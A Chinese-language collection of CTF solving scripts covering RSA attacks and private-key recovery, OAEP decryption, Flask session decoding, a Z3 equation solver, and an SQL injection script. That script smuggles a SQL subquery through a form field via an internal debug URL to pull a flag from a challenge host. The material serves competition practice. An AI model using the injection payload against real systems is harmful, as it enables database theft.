from Crypto.PublicKey import RSA

keypair = RSA.generate(1024)

keypair.p = 275127860351348928173285174381581152299
keypair.q = 319576316814478949870590164193048041239
keypair.e = 65537

keypair.n = keypair.p * keypair.q
Qn = long((keypair.p-1) * (keypair.q-1))

i = 1
while (True):
x = (Qn * i ) + 1
if (x % keypair.e == 0):
keypair.d = x / keypair.e
break
i += 1

private = open('private.pem','w')
private.write(keypair.exportKey())
private.close()

RsaCtfTool

因为是现成的工具,所以这里记录用法
例子: 已知ne,e特别大,进行wiener attack

1
2
3
4
5
6
7
8
# 把n,e转换为pem格式
python RsaCtfTool.py --createpub -n xxx -e xxx > test.pem
# 已知公钥求私钥
python RsaCtfTool.py --publickey test.pem --private > test.key
# 已知公钥文件和加密文件
python RsaCtfTool.py --publickey xxx.pem --uncipherfile xxx.txt
# 把pem格式的公钥转换为n,e
python RsaCtfTool.py --key test.key --dumpkey

得到nedpq值后通过脚本解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/python
# -*- coding:utf8 -
from libnum import n2s,s2n

def gcd(a, b): #求最大公约数
if a < b:
a, b = b, a
while b != 0:
temp = a % b
a = b
b = temp
return a
def egcd(a,b): #扩展欧几里得算法
if a==0:
return (b,0,1)
else:
g,y,x=egcd(b%a,a)
return (g,x-(b//a)*y,y)

def modinv(a,m):
g,x,y=egcd(a,m)
if g!=1:
raise Exception('modular inverse does not exist')
else:
return x%m
if __name__ == '__main__':
p =15991846970993213322072626901560749932686325766403404864023341810735319249066370916090640926219079368845510444031400322229147771682961132420481897362843199
q =28805791771260259486856902729020438686670354441296247148207862836064657849735343618207098163901787287368569768472521344635567334299356760080507454640207003
e = 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619
d =modinv(e,(p-1)*(q-1))
c =38230991316229399651823567590692301060044620412191737764632384680546256228451518238842965221394711848337832459443844446889468362154188214840736744657885858943810177675871991111466653158257191139605699916347308294995664530280816850482740530602254559123759121106338359220242637775919026933563326069449424391192
n =p*q
m = pow(c,d,n)
print n2s(m)

私钥恢复

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
#/!usr/bin/env python
#coding:utf-8
# 恢复公钥
from Crypto.PublicKey import RSA

public_key_file = "./tmp/pubkey.pem"
with open(public_key_file, "r") as f:
public_key = RSA.importKey(f)
n = public_key.n
e = public_key.e
print("n=\n%s\ne=\n%s"%(n,e))

# wqm @ wqm-top in ~/下载/i春秋/密码/RSA脚本整理/5私钥恢复和最优非对称加密填充/ISC2016训练赛——phrackCTF--600--godlikeRSA [22:24:30]
$ cat get_private_key.py
#!/usr/bin/python
#-*- coding:utf-8 -*-
#私钥修复
import re
import pickle
from itertools import product
from libnum import invmod, gcd


def solve_linear(a, b, mod):
if a & 1 == 0 or b & 1 == 0:
return None
return (b * invmod(a, mod)) & (mod - 1) # hack for mod = power of 2


def to_n(s):
s = re.sub(r"[^0-9a-f]", "", s)
return int(s, 16)


def msk(s):
cleaned = "".join(map(lambda x: x[-2:], s.split(":")))
return msk_ranges(cleaned), msk_mask(cleaned), msk_val(cleaned)


def msk_ranges(s):
return [range(16) if c == " " else [int(c, 16)] for c in s]


def msk_mask(s):
return int("".join("0" if c == " " else "f" for c in s), 16)


def msk_val(s):
return int("".join("0" if c == " " else c for c in s), 16)


E = 65537

N = to_n("""00:c0:97:78:53:45:64:84:7d:8c:c4:b4:20:e9:33:
58:67:ec:78:3e:6c:f5:f0:5c:a0:3e:ee:dc:25:63:
d0:eb:2a:9e:ba:8f:19:52:a2:67:0b:e7:6e:b2:34:
b8:6d:50:76:e0:6a:d1:03:cf:77:33:d8:b1:e9:d7:
3b:e5:eb:1c:65:0c:25:96:fd:96:20:b9:7a:de:1d:
bf:fd:f2:b6:bf:81:3e:3e:47:44:43:98:bf:65:2f:
67:7e:27:75:f9:56:47:ba:c4:f0:4e:67:2b:da:e0:
1a:77:14:40:29:c1:a8:67:5a:8f:f5:2e:be:8e:82:
31:3d:43:26:d4:97:86:29:15:14:a9:69:36:2c:76:
ed:b5:90:eb:ec:6f:ce:d5:ca:24:1c:aa:f6:63:f8:
06:a2:62:cb:26:74:d3:5b:82:4b:b6:d5:e0:49:32:
7b:62:f8:05:c4:f7:0e:86:59:9b:f3:17:25:02:aa:
3c:97:78:84:7b:16:fd:1a:f5:67:cf:03:17:97:d0:
c6:69:85:f0:8d:fa:ce:ee:68:24:63:06:24:e1:e4:
4c:f8:e9:ad:25:c7:e0:c0:15:bb:b4:67:48:90:03:
9b:20:7f:0c:17:eb:9d:13:44:ab:ab:08:a5:c3:dc:
c1:98:88:c5:ce:4f:5a:87:9b:0b:bf:bd:d7:0e:a9:
09:59:81:fa:88:4f:59:60:6b:84:84:ad:d9:c7:25:
8c:e8:c0:e8:f7:26:9e:37:95:7c:e1:48:29:0f:51:
e7:bd:98:2f:f6:cc:80:e7:f0:32:0b:89:51:92:4e:
c2:6d:50:53:2b:3b:77:72:d1:bd:1a:1f:92:d7:12:
79:61:61:c5:a4:7e:b3:85:eb:f0:7c:6d:46:03:c5:
e6:d5:81:2c:ba:7e:ea:8d:51:7d:63:55:34:2a:b6:
d4:dc:31:5a:f1:99:e3:dc:8c:83:0b:a2:2a:d5:3c:
41:48:41:54:1a:a9:e8:b6:70:bf:d3:fe:ed:19:17:
14:94:13:b3:17:e3:8b:8e:6f:53:ed:e2:44:e8:4a:
32:d6:5c:0d:a8:80:f5:fc:02:e9:46:55:d5:a4:d3:
e7:c6:30:77:f9:73:e9:44:52:d8:13:9d:5d:bf:9e:
fa:3a:b5:96:79:82:5b:cd:19:5c:06:a9:00:96:fd:
4c:a4:73:88:1a:ec:3c:11:de:b9:3d:e0:50:00:1e:
ac:21:97:a1:96:7d:6b:15:f9:6c:c9:34:7f:70:d7:
9d:2d:d1:48:4a:81:71:f8:12:dd:32:ba:64:31:60:
08:26:4b:09:22:03:83:90:17:7f:f3:a7:72:57:bf:
89:6d:e4:d7:40:24:8b:7b:bd:df:33:c0:ff:30:2e:
e8:6c:1d""")

p_ranges, pmask_msk, pmask_val = msk(""" 0: e: : : :c :c : : : :b : : : : :
:ab: e: 2: 8:c : : : 1:6 :6 : 6: f:d9: 0:
8 :5c:7 :06: : : :0 : 3:5 :4b: :6 : : :
2 : :6 : : : :2 :bc: c: :85:1 : 1:d : 3:
1:b4: : b: 1: 3: d:a : : :6e: 0:b :2 : :
:b : :9 :e : :82:8d: : :13: : : a: a:
: :4 : :c : f: : :7 :e :0a: : : b: 5:
: e:91:3 : :3c: 9: : 6: : :b5:7d: 1: :
: : :b :a1:99:6 :4 :3 :c :1a:02:4 : : 9:
9 :f : d:bd: :0 : : : :b3: : 4: :e9: 9:
: d: : :7 : :93: : e:dc: : 0: :e7: :
e : :2 : b: 2:5 : : : : : c:5f: : :e2:
: : 9: :2a: : e: : :2 : :9f: 7:3 : :
b : f:b : : 8: 7: : :f :6 :e :c : :3 : :
f7: 5: 8: 5: : : : : : 8: e: :03: c: :
33:76:e : 1:7 : c: : 0: :0b: : a: : 2: 9:
:c8:bf: : :06: 7:d5: :02: c:b :e2: 7:2 :
: """)

q_ranges, qmask_msk, qmask_val = msk(""" 0: f: :d0: 1:55: 4:31: : b:c4:8 : : e: d:
34: 3:f : : : : : 8:99:1 : : a:0 : :4 :
0 : :f : :a4:41:2 : :a : : 1: : a: c: :
: : 9: : : 2:f4: f: : : : :1 : 4:9 :
a : : :79:0 : : : : : 2: 8:b : :4 : 8:
:9b: 1: :d : :f :e4: :4 :c :e : :3 : :
7:2 : :d :8 :2 :7 : :d :67:fc:e : 0:f9: 7:
8 : : : :1 :2f: :51: : :2e:0a: e:3d: 6:
b : :dd: : 0:fb: :f4: : : :b4: 9:c : :
a: : : :d : : :6b: 2: :9b: a:60: :d6:
0:4f:16:d1: : :5 :fc: :f : :8 : : : :
1: 6:e1:9 : e:4 : 6: c: d:d :73: 3: : :7 :
:8 : 9: :3b:f : 2: : :f1: e: : :1e: :
8 : : : 6:0 : 4:99:e : : 5: : : 4: : :
: a:81:64: :7 :f : 9: d: :9 : : 7:93:f :
ac:8c: : 8: : 0: d: 8: :7 : :1d: :f : :
1 :a :6 :8 : :60: :b3: : : :89: : :14:
:5 """)

_, dmask_msk, dmask_val = msk(""" : : : f:8 :a5:d : 2: 0:b :7 : : 1: : 4:
1:0d: :3 : :6 : : : b: : : :e : : :
0e: 0:db: :1a:1c:c0: : e: : :99:bc:8 :a5:
7 :7 :7 : b: : : 8: 8: :7 :55: 2: : :f :
b2: : :b :f :4 : : 8: :b : : : : 0: :
0 : :6 :9 : : : : b: 4: : 0: a: 5:07:b :
9: c:9a: 9: : 7:9e: : b:60:f : : : :0 :
: 3:0 : : : : 1:b : : : b: 6:0 :f : :
: 2:18: 6: b:1 : : : : :d3:f3: :a : :
3: : : : : 3: d: 1: 2:7 : : d: : 2: d:
: : d:4 : :d : :6d: c:a :b6: : : : 1:
69: : 7: :89: :c :8 :61: d:25: 3:7 :1b: 4:
b : :8 :55: :49: 1:2 :3 : :1 :e9:a8: 3: :
9 : : 1:f8:d3: :e : :d : :9 :b6: : :71:
1 : :c1: : b: 1: : 6:e : :64: : :1a:c :
: b: :bf:c : : 0: : 8:a :4 : :26:a :5 :
6 : : : :eb: :e5: a: :3e:f9:10:0 : : :
6:0 : : 8: : 1:72: c:0 : f:5 : f:9c: 0: e:
7:b : : : : :d9: 4: : e:c :68: : : :
c: :3a: : :a0:ea: 3: 4: :72:a :d : 8: :
:0d:5 :0 : a: 7:c :bb: 6: 4:a :ce:d :2 : 1:
: :17:6 : : c: b: : f: :3 : 5:6 :3 :0e:
: 7:c :3e: 2: 9: 7: 6: f: e: f: 9: :f3: 9:
a :c1:6 : : 1:9 : :43: : f: 5: :0 :27: 4:
4 :a : :e9: : 8: 4:3 :8a: 6:16:d5:c : e: e:
:d : c:b :a8: : 7: : 9: :7 :7d: : : :
: : :4 :2 : : 3: 3: 6: : : :7b:0 : :
e: :0 : :a : : 5: : : : 5:1 :82:c :0d:
4 :2 :fd:36: 5:50:0 : : :d : f: 6: : :e :
0 : : :ce: :9e:8 : :0 :d :07:b3: : : :
0 :e4: : :68:b :c : : c:5 : : :3 : 7: 2:
c:e0: :5 : : :b4: :ef: 7: :1 :e : 0:f :
:6 : : : :e0:c :3 : : : 3: : d: : :
3: 3: c: a: :b : a:71: 3: 0:a : :4 :5d: :
0 :4 """)

_, dpmask_msk, dpmask_val = msk(""" : 3:2a: : d: : : : :0 :1 : f: : : 6:
1 :2 :1b:07: a:e :b :c5:58:7 : :e8: 7: 1: c:
: 1:b :a0: 4:0f:5 :67: :3 :7 :6 :f9: : c:
:79: 0:1 :65: :8 : :99: d:d : :2 :9 :0 :
e: :0 : : : : d: :d :7 :6 :a9: a:8b: b:
: : 7: a:37: : :7 :1 :6 : :c2: 7:6 :b :
e: : : : : : :b :3a:5 : : : : : :
: : :cd:8 : : d: :7 : 3: : f:e : c: :
: a: :c : f:c : 7:b :5 : : :2 :8 :8 :6 :
0a: a: : :3 :db: : 4:00: : d: :b : 5: :
20: 2: 5: :82: : 0: 6: :8a: :7 : : 8: :
4: 1: : : : 8:46: : : : : : 0:f :c8:
2 : : c:7 : : 1: : :2 : 0: 5: : : 1:9b:
6:9 : 0:74: :c : :e : : :cb:b :3 :3 : :
2: : :47: :2 : 0:5 : : : d: 6:83: : :
:c7: : :0b: : : c: :3 :8 : :9 :4 : 7:
5 :c0:fe: :f9: 1: :0 : e: 8:02: : f: :c :
55:61""")

_, dqmask_msk, dqmask_val = msk(""" :0b:7 :4 :0 : 0:6 : 7:7e: : 5: : 7: : a:
a :d : 0: 6: 4:86: : :8 : : : : :e :8f:
9: : : : 1: :2 : : 7: b:1 :5 : f: :8 :
:d :21: :e : d: :c9:e : b: : :1 : : :
:d :a2:b7: : : :f3: :42: :e : c: :f :
: 0:f :7 : 4: 5:34: :4 : c: : :8 :d : 8:
5 :af: 3:1d: 5:4 : :2 : :6 :c : 6:a :1 :5 :
a:9 : :d : : :0a:a1: :f :7 :9 :b : : :
f:2 :27: f: :0 :f6:4d: : : : : :5 : :
4:08: : 5: : 8: 5: : : :18: 4: 8:57: 2:
f: a: : :a8: f: c:f : e: 1:9 :c : 4:9 : :
: : : : : 1: :2 : :d1: : 6:e : d: :
: f:04:2 :8d: : 3: : :b : 8: :d6: : 2:
: : :6 : : f: : : 0:6 : :51: :48:19:
: : :69:4 : c: :c : : f: :f4:d : : f:
d:0 :0d:b :3 : 3:2 : : :6 : b:5 :2 : : c:
1:5a: f:f : : :7e:3e: :d :f :0 : d: c: 6:
1""")


def search(K, Kp, Kq, check_level, break_step):
max_step = 0
cands = [0]
for step in range(1, break_step + 1):
#print " ", step, "( max =", max_step, ")"
max_step = max(step, max_step)

mod = 1 << (4 * step)
mask = mod - 1

cands_next = []
for p, new_digit in product(cands, p_ranges[-step]):
pval = (new_digit << ((step - 1) * 4)) | p

if check_level >= 1:
qval = solve_linear(pval, N & mask, mod)
if qval is None or not check_val(qval, mask, qmask_msk, qmask_val):
continue

if check_level >= 2:
val = solve_linear(E, 1 + K * (N - pval - qval + 1), mod)
if val is None or not check_val(val, mask, dmask_msk, dmask_val):
continue

if check_level >= 3:
val = solve_linear(E, 1 + Kp * (pval - 1), mod)
if val is None or not check_val(val, mask, dpmask_msk, dpmask_val):
continue

if check_level >= 4:
val = solve_linear(E, 1 + Kq * (qval - 1), mod)
if val is None or not check_val(val, mask, dqmask_msk, dqmask_val):
continue

if pval * qval == N:
print "Kq =", Kq
print "pwned"
print "p =", pval
print "q =", qval
p = pval
q = qval
d = invmod(E, (p - 1) * (q - 1))
coef = invmod(p, q)

from Crypto.PublicKey import RSA
print RSA.construct(map(long, (N, E, d, p, q, coef))).exportKey()
quit()

cands_next.append(pval)

if not cands_next:
return False
cands = cands_next
return True



def check_val(val, mask, mask_msk, mask_val):
test_mask = mask_msk & mask
test_val = mask_val & mask
return val & test_mask == test_val


# K = 4695
# Kp = 15700
# Kq = 5155

for K in range(1, E):
if K % 100 == 0:
print "checking", K
if search(K, 0, 0, check_level=2, break_step=20):
print "K =", K
break

for Kp in range(1, E):
if Kp % 1000 == 0:
print "checking", Kp
if search(K, Kp, 0, check_level=3, break_step=30):
print "Kp =", Kp
break

for Kq in range(1, E):
if Kq % 100 == 0:
print "checking", Kq
if search(K, Kp, Kq, check_level=4, break_step=9999):
print "Kq =", Kq
break

最优非对称加密填充

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/usr/bin/python
# coding=utf-8

#最优非对称加密填充
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP

with open('./tmp/pubkey.pem', 'r') as f:
key = RSA.importKey(f)
N = key.n
e = key.e
print N
print e

with open('./tmp/private.pem', 'r') as f:
private = RSA.importKey(f)
oaep = PKCS1_OAEP.new(private)

with open('./tmp/flag.enc', 'r') as f:
print oaep.decrypt(f.read())

session解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)

decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True

try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')

if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')

return session_json_serializer.loads(payload)

if __name__ == '__main__':
print(decryption(sys.argv[1].encode()))

sql注入get多参数爆破脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import requests
import random
import urllib
url = 'http://111.198.29.45:57232/download.php'
# subquery = "database()"
# ssrfw
# subquery = "select table_name from information_schema.tables where table_schema='ssrfw' LIMIT 1"
# cetcYssrf
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1"
# secretname -> flag
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1, 1"
# value -> flag{cpg9ssnu_OOOOe333eetc_2018}
subquery = "select value from cetcYssrf LIMIT 1"
id = random.randint(1, 10000000)
d = ('http://127.0.0.1/secret/secret_debug.php?' +
urllib.parse.urlencode({
"s": "3",
"txtfirst_name": "L','1',("+subquery+"),'1'/*",
"txtmiddle_name": "m",
"txtLast_name": "y",
"txtname_suffix": "Esq.",
"txtdob": "*/,'12/19/2019",
"txtdl_nmbr": id,
"txtRetypeDL": id
}) + "&")
r = requests.get(url, params={"dl": d})
print(r.text)

Z3解方程脚本

by巴伐利亚师傅

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
import builtins
from z3 import *

v0=Int('v0')
v1=Int('v1')
v2=Int('v2')
v3=Int('v3')
v4=Int('v4')
v5=Int('v5')
v6=Int('v6')
v7=Int('v7')
v8=Int('v8')
v9=Int('v9')
v10=Int('v10')
v11=Int('v11')
v12=Int('v12')
v13=Int('v13')
v14=Int('v14')
v15=Int('v15')
v16=Int('v16')
v17=Int('v17')
v18=Int('v18')
v19=Int('v19')
v20=Int('v20')
v21=Int('v21')
v22=Int('v22')
v23=Int('v23')
v24=Int('v24')
v25=Int('v25')
v26=Int('v26')
v27=Int('v27')
v28=Int('v28')
v29=Int('v29')
v30=Int('v30')
v31=Int('v31')
v32=Int('v32')
v33=Int('v33')
v34=Int('v34')

s = Solver()
s.add(281*v0+1020*v1+980*v2+902*v3+338*v4+960*v5+1001*v6+1017*v7+963*v8+442*v9+536*v10+1022*v11+212*v12+186*v13+657*v14+886*v15+243*v16+802*v17+751*v18+742*v19+712*v20+316*v21+256*v22+928*v23+1011*v24+707*v25+415*v26+244*v27+962*v28+796*v29+473*v30+96*v31+598*v32+948*v33+416*v34==12220997)
s.add(442*v0+272*v1+973*v2+311*v3+886*v4+465*v5+91*v6+579*v7+88*v8+1000*v9+20*v10+914*v11+991*v12+953*v13+47*v14+117*v15+216*v16+693*v17+346*v18+374*v19+175*v20+46*v21+221*v22+485*v23+1022*v24+28*v25+380*v26+997*v27+411*v28+421*v29+361*v30+81*v31+145*v32+941*v33+325*v34==9213917)
s.add(175*v0+989*v1+486*v2+717*v3+146*v4+418*v5+446*v6+598*v7+526*v8+363*v9+18*v10+332*v11+103*v12+834*v13+443*v14+407*v15+870*v16+999*v17+278*v18+624*v19+863*v20+486*v21+413*v22+825*v23+347*v24+543*v25+362*v26+645*v27+505*v28+738*v29+612*v30+268*v31+94*v32+646*v33+32*v34==8907244)
s.add(987*v0+454*v1+828*v2+508*v3+993*v4+762*v5+497*v6+83*v7+591*v8+533*v9+955*v10+265*v11+568*v12+117*v13+818*v14+133*v15+1*v16+305*v17+319*v18+257*v19+273*v20+956*v21+260*v22+349*v23+719*v24+416*v25+956*v26+388*v27+795*v28+43*v29+378*v30+379*v31+295*v32+603*v33+722*v34==10103617)
s.add(851*v0+884*v1+425*v2+538*v3+627*v4+548*v5+714*v6+129*v7+46*v8+445*v9+444*v10+1002*v11+170*v12+162*v13+476*v14+849*v15+136*v16+929*v17+392*v18+341*v19+747*v20+385*v21+318*v22+503*v23+248*v24+308*v25+838*v26+567*v27+565*v28+878*v29+831*v30+561*v31+222*v32+363*v33+74*v34==9423443)
s.add(227*v0+218*v1+313*v2+37*v3+247*v4+952*v5+499*v6+908*v7+50*v8+344*v9+182*v10+980*v11+568*v12+648*v13+944*v14+538*v15+886*v16+280*v17+18*v18+207*v19+21*v20+532*v21+38*v22+1007*v23+890*v24+335*v25+748*v26+88*v27+478*v28+539*v29+966*v30+961*v31+632*v32+350*v33+289*v34==9333864)
s.add(514*v0+216*v1+267*v2+873*v3+974*v4+573*v5+496*v6+494*v7+814*v8+251*v9+852*v10+379*v11+217*v12+426*v13+772*v14+501*v15+104*v16+607*v17+824*v18+716*v19+875*v20+580*v21+247*v22+232*v23+642*v24+381*v25+423*v26+446*v27+88*v28+273*v29+166*v30+865*v31+436*v32+829*v33+303*v34==10203418)
s.add(123*v0+914*v1+660*v2+603*v3+528*v4+536*v5+543*v6+518*v7+489*v8+1021*v9+739*v10+90*v11+933*v12+610*v13+548*v14+560*v15+537*v16+552*v17+191*v18+320*v19+344*v20+968*v21+469*v22+106*v23+497*v24+329*v25+736*v26+720*v27+465*v28+63*v29+159*v30+929*v31+916*v32+209*v33+635*v34==10386146)
s.add(325*v0+226*v1+700*v2+983*v3+881*v4+274*v5+169*v6+180*v7+912*v8+931*v9+276*v10+934*v11+1001*v12+634*v13+247*v14+937*v15+904*v16+546*v17+909*v18+884*v19+756*v20+358*v21+649*v22+381*v23+946*v24+457*v25+523*v26+598*v27+766*v28+781*v29+429*v30+644*v31+115*v32+358*v33+981*v34==12003802)
s.add(45*v0+384*v1+538*v2+328*v3+477*v4+451*v5+822*v6+30*v7+652*v8+145*v9+223*v10+144*v11+405*v12+288*v13+993*v14+983*v15+817*v16+702*v17+270*v18+460*v19+336*v20+984*v21+68*v22+274*v23+976*v24+306*v25+234*v26+913*v27+809*v28+923*v29+606*v30+246*v31+1002*v32+73*v33+738*v34==9293993)
s.add(760*v0+920*v1+296*v2+721*v3+886*v4+733*v5+461*v6+850*v7+777*v8+156*v9+919*v10+480*v11+946*v12+597*v13+585*v14+969*v15+516*v16+682*v17+255*v18+576*v19+256*v20+558*v21+419*v22+978*v23+739*v24+537*v25+236*v26+140*v27+951*v28+893*v29+235*v30+861*v31+40*v32+544*v33+987*v34==12024112)
s.add(156*v0+359*v1+443*v2+477*v3+635*v4+394*v5+784*v6+193*v7+58*v8+1022*v9+792*v10+535*v11+146*v12+186*v13+405*v14+8*v15+646*v16+259*v17+791*v18+835*v19+755*v20+985*v21+156*v22+908*v23+756*v24+285*v25+755*v26+243*v27+790*v28+100*v29+22*v30+822*v31+244*v32+518*v33+451*v34==9044332)
s.add(747*v0+892*v1+582*v2+435*v3+958*v4+289*v5+1020*v6+288*v7+257*v8+218*v9+314*v10+97*v11+1015*v12+229*v13+601*v14+788*v15+979*v16+146*v17+391*v18+726*v19+708*v20+861*v21+447*v22+636*v23+1020*v24+470*v25+219*v26+494*v27+607*v28+601*v29+263*v30+801*v31+294*v32+361*v33+735*v34==10302431)
s.add(84*v0+262*v1+338*v2+565*v3+97*v4+0*v5+174*v6+801*v7+537*v8+959*v9+317*v10+10*v11+673*v12+70*v13+149*v14+520*v15+351*v16+405*v17+294*v18+1008*v19+597*v20+979*v21+587*v22+539*v23+100*v24+120*v25+329*v26+861*v27+293*v28+887*v29+191*v30+275*v31+380*v32+631*v33+748*v34==7441063)
s.add(227*v0+26*v1+510*v2+943*v3+982*v4+28*v5+613*v6+321*v7+641*v8+474*v9+48*v10+105*v11+200*v12+307*v13+573*v14+593*v15+854*v16+511*v17+442*v18+912*v19+936*v20+517*v21+217*v22+891*v23+731*v24+5*v25+5*v26+752*v27+707*v28+355*v29+668*v30+372*v31+728*v32+619*v33+934*v34==8480144)
s.add(409*v0+161*v1+233*v2+346*v3+79*v4+17*v5+370*v6+996*v7+898*v8+647*v9+290*v10+312*v11+816*v12+780*v13+263*v14+276*v15+114*v16+386*v17+384*v18+287*v19+160*v20+947*v21+68*v22+363*v23+529*v24+841*v25+543*v26+424*v27+935*v28+713*v29+323*v30+632*v31+560*v32+160*v33+507*v34==9108423)
s.add(651*v0+994*v1+22*v2+888*v3+347*v4+72*v5+82*v6+323*v7+66*v8+915*v9+14*v10+400*v11+314*v12+132*v13+143*v14+512*v15+375*v16+312*v17+173*v18+196*v19+644*v20+459*v21+475*v22+166*v23+352*v24+481*v25+439*v26+409*v27+17*v28+522*v29+66*v30+887*v31+529*v32+420*v33+345*v34==6750308)
s.add(605*v0+434*v1+86*v2+845*v3+595*v4+995*v5+974*v6+229*v7+847*v8+83*v9+821*v10+278*v11+18*v12+936*v13+413*v14+219*v15+708*v16+618*v17+852*v18+602*v19+290*v20+352*v21+412*v22+586*v23+515*v24+504*v25+39*v26+577*v27+598*v28+116*v29+460*v30+543*v31+343*v32+3*v33+629*v34==9625384)
s.add(603*v0+905*v1+403*v2+224*v3+327*v4+806*v5+1018*v6+266*v7+310*v8+647*v9+79*v10+98*v11+147*v12+763*v13+2*v14+117*v15+252*v16+738*v17+211*v18+858*v19+962*v20+45*v21+483*v22+603*v23+911*v24+729*v25+431*v26+135*v27+575*v28+404*v29+882*v30+1013*v31+72*v32+568*v33+621*v34==9317350)
s.add(449*v0+540*v1+314*v2+887*v3+163*v4+562*v5+213*v6+760*v7+80*v8+285*v9+530*v10+208*v11+863*v12+302*v13+38*v14+1005*v15+279*v16+444*v17+121*v18+27*v19+49*v20+693*v21+442*v22+661*v23+722*v24+739*v25+734*v26+766*v27+111*v28+781*v29+65*v30+790*v31+703*v32+227*v33+28*v34==8606739)
s.add(459*v0+686*v1+290*v2+86*v3+454*v4+743*v5+49*v6+324*v7+648*v8+268*v9+613*v10+63*v11+873*v12+34*v13+406*v14+24*v15+308*v16+257*v17+994*v18+539*v19+982*v20+114*v21+145*v22+799*v23+343*v24+885*v25+236*v26+754*v27+232*v28+560*v29+128*v30+262*v31+423*v32+240*v33+872*v34==8487191)
s.add(32*v0+26*v1+11*v2+132*v3+306*v4+143*v5+200*v6+950*v7+472*v8+821*v9+505*v10+831*v11+462*v12+521*v13+474*v14+821*v15+220*v16+674*v17+207*v18+783*v19+9*v20+322*v21+780*v22+1010*v23+147*v24+667*v25+997*v26+323*v27+200*v28+332*v29+762*v30+37*v31+642*v32+461*v33+328*v34==9002065)
s.add(82*v0+151*v1+994*v2+1007*v3+19*v4+761*v5+408*v6+672*v7+387*v8+875*v9+933*v10+420*v11+571*v12+673*v13+691*v14+663*v15+483*v16+721*v17+298*v18+45*v19+336*v20+348*v21+734*v22+642*v23+0*v24+989*v25+649*v26+997*v27+634*v28+644*v29+412*v30+517*v31+703*v32+307*v33+570*v34==10212884)
s.add(345*v0+907*v1+886*v2+526*v3+333*v4+388*v5+405*v6+122*v7+365*v8+624*v9+48*v10+198*v11+602*v12+879*v13+161*v14+506*v15+710*v16+260*v17+203*v18+970*v19+731*v20+1014*v21+237*v22+954*v23+457*v24+693*v25+34*v26+1010*v27+462*v28+895*v29+648*v30+159*v31+753*v32+909*v33+666*v34==9777472)
s.add(548*v0+483*v1+386*v2+629*v3+24*v4+340*v5+702*v6+423*v7+721*v8+172*v9+494*v10+422*v11+834*v12+881*v13+602*v14+7*v15+304*v16+70*v17+368*v18+202*v19+714*v20+230*v21+53*v22+910*v23+745*v24+745*v25+1020*v26+227*v27+513*v28+72*v29+528*v30+597*v31+852*v32+22*v33+649*v34==9178370)
s.add(685*v0+438*v1+750*v2+512*v3+1013*v4+403*v5+429*v6+254*v7+807*v8+169*v9+420*v10+233*v11+696*v12+806*v13+414*v14+697*v15+506*v16+215*v17+39*v18+300*v19+32*v20+877*v21+855*v22+618*v23+615*v24+19*v25+276*v26+268*v27+777*v28+95*v29+204*v30+641*v31+335*v32+955*v33+885*v34==9671988)
s.add(657*v0+450*v1+852*v2+306*v3+854*v4+986*v5+612*v6+679*v7+414*v8+424*v9+63*v10+772*v11+630*v12+378*v13+308*v14+228*v15+177*v16+879*v17+998*v18+1003*v19+172*v20+722*v21+923*v22+78*v23+383*v24+302*v25+106*v26+710*v27+199*v28+470*v29+519*v30+982*v31+881*v32+409*v33+74*v34==11123701)
s.add(756*v0+184*v1+168*v2+356*v3+1007*v4+971*v5+469*v6+668*v7+10*v8+748*v9+254*v10+183*v11+667*v12+996*v13+28*v14+588*v15+146*v16+365*v17+761*v18+729*v19+107*v20+195*v21+579*v22+475*v23+851*v24+66*v25+944*v26+469*v27+285*v28+367*v29+459*v30+301*v31+1019*v32+411*v33+240*v34==10125797)
